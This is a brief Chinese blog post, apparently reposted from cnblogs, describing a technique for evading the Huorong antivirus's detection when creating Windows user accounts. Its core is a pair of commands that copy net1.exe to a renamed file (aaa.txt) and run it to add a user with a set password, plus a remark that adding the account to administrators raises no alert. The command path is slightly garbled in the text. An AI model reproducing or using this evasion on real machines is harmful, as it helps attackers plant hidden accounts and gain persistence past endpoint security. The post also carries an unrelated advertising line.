添加用户(过火绒)

源自于某安全实验室发文,文章出来一小时内就被删啦,大致内容如下


正常添加net和net1拦截如下


文章其实实际就是火绒加用户的绕过方式,也并非火绒存在漏洞,火绒官方都发文了!添加用户最终效果如下
copy c:windowssystem32
et1.exe  aaa.txt
aaa.txt user y11 Aa123456@@@ /add


其实也就只检测了加用户,加管理是不会有告警的

联系邮箱:yang_s1r@163.com 博客园地址:https://www.cnblogs.com/Yang34/
【推广】 免费学中医,健康全家人
原文地址:https://www.cnblogs.com/Yang34/p/14488100.html